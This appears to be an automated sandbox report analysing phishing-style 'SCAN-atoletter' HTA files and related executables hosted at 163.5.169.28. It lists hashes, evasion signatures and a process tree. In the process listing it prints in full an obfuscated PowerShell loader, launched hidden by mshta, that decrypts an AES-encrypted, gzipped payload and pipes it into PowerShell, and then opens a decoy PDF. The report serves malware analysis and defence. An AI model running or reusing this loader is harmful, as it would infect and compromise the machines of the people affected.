Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
1163.5.169....r2.pdf
windows10-2004-x64
1163.5.169....r3.hta
windows7-x64
3163.5.169....r3.hta
windows10-2004-x64
10163.5.169....r3.pdf
windows7-x64
1163.5.169....r3.pdf
windows10-2004-x64
1163.5.169....r4.hta
windows7-x64
3163.5.169....r4.hta
windows10-2004-x64
7163.5.169....r4.pdf
windows7-x64
1163.5.169....r4.pdf
windows10-2004-x64
1163.5.169....r5.hta
windows7-x64
3163.5.169....r5.hta
windows10-2004-x64
10163.5.169....r5.pdf
windows7-x64
1163.5.169....r5.pdf
windows10-2004-x64
1163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
7163.5.169....er.hta
windows7-x64
3163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
1163.5.169....ry.gif
windows7-x64
1163.5.169....ry.gif
windows10-2004-x64
1163.5.169....nk.gif
windows7-x64
1163.5.169....nk.gif
windows10-2004-x64
1163.5.169.28/cmd.exe
windows7-x64
163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
1163.5.169.28/cmt.exe
windows10-2004-x64
1163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2024 21:28
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
163.5.169.28/binary.gif
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
163.5.169.28/binary.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
163.5.169.28/blank.gif
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
163.5.169.28/blank.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
163.5.169.28/cmd.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
163.5.169.28/cmt.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
163.5.169.28/fd1.exe
Resource
win7-20231129-en
Behavioral task
behavioral32
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20231222-en
General
-
Target
163.5.169.28/SCAN-atoletter2.hta
-
Size
1.1MB
-
MD5
0e02311efc79d0580a3ae453f00cce83
-
SHA1
77721025336c37d0df3349badaa71e6610c6d429
-
SHA256
01e20536cc9847e7411bbb0e4d7381774f0e5e4cc86bfd6fdf0e12229d1d2786
-
SHA512
312589562ec740619629402876f4c077b56e0f3985686a6747c8c1d277f1bb56b41c21ef4fa1054178105a584692d3f6fc09af76e5edf4c6773826836c4b7bae
-
SSDEEP
1536:y4pLmOmQ7Mf99jXfqe+Wjyosy3vmr/l1vcmafSIm+lIWFR3QXdpkJJ0sVaVMHfFP:y4pLZmQ7CJXReoz3zH
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 44 4408 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 3868 powershell.exe 3868 powershell.exe 4408 powershell.exe 4408 powershell.exe 2100 powershell.exe 2100 powershell.exe 2100 powershell.exe 4408 powershell.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeSystemEnvironmentPrivilege 4408 powershell.exe Token: SeRemoteShutdownPrivilege 4408 powershell.exe Token: SeUndockPrivilege 4408 powershell.exe Token: SeManageVolumePrivilege 4408 powershell.exe Token: 33 4408 powershell.exe Token: 34 4408 powershell.exe Token: 35 4408 powershell.exe Token: 36 4408 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeSystemEnvironmentPrivilege 4408 powershell.exe Token: SeRemoteShutdownPrivilege 4408 powershell.exe Token: SeUndockPrivilege 4408 powershell.exe Token: SeManageVolumePrivilege 4408 powershell.exe Token: 33 4408 powershell.exe Token: 34 4408 powershell.exe Token: 35 4408 powershell.exe Token: 36 4408 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeSystemEnvironmentPrivilege 4408 powershell.exe Token: SeRemoteShutdownPrivilege 4408 powershell.exe Token: SeUndockPrivilege 4408 powershell.exe Token: SeManageVolumePrivilege 4408 powershell.exe Token: 33 4408 powershell.exe Token: 34 4408 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3688 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe 3688 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 676 wrote to memory of 3868 676 mshta.exe 92 PID 676 wrote to memory of 3868 676 mshta.exe 92 PID 676 wrote to memory of 3868 676 mshta.exe 92 PID 3868 wrote to memory of 788 3868 powershell.exe 95 PID 3868 wrote to memory of 788 3868 powershell.exe 95 PID 3868 wrote to memory of 788 3868 powershell.exe 95 PID 788 wrote to memory of 2100 788 cmd.exe 98 PID 788 wrote to memory of 2100 788 cmd.exe 98 PID 788 wrote to memory of 2100 788 cmd.exe 98 PID 788 wrote to memory of 4408 788 cmd.exe 97 PID 788 wrote to memory of 4408 788 cmd.exe 97 PID 788 wrote to memory of 4408 788 cmd.exe 97 PID 4408 wrote to memory of 3688 4408 powershell.exe 101 PID 4408 wrote to memory of 3688 4408 powershell.exe 101 PID 4408 wrote to memory of 3688 4408 powershell.exe 101 PID 3688 wrote to memory of 988 3688 AcroRd32.exe 108 PID 3688 wrote to memory of 988 3688 AcroRd32.exe 108 PID 3688 wrote to memory of 988 3688 AcroRd32.exe 108 PID 3688 wrote to memory of 3820 3688 AcroRd32.exe 111 PID 3688 wrote to memory of 3820 3688 AcroRd32.exe 111 PID 3688 wrote to memory of 3820 3688 AcroRd32.exe 111 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113 PID 988 wrote to memory of 3428 988 RdrCEF.exe 113
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\SCAN-atoletter2.pdf"5⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140436⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3F06DB6C3FD8FF315E8D62A9C297045A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3F06DB6C3FD8FF315E8D62A9C297045A --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:17⤵PID:3428
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DB2C3EFA70A8D873EEE92E247426BD93 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵PID:1700
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CAE453DB76D73B22B4AA097D55DE2CDB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CAE453DB76D73B22B4AA097D55DE2CDB --renderer-client-id=4 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job /prefetch:17⤵PID:3860
-
-
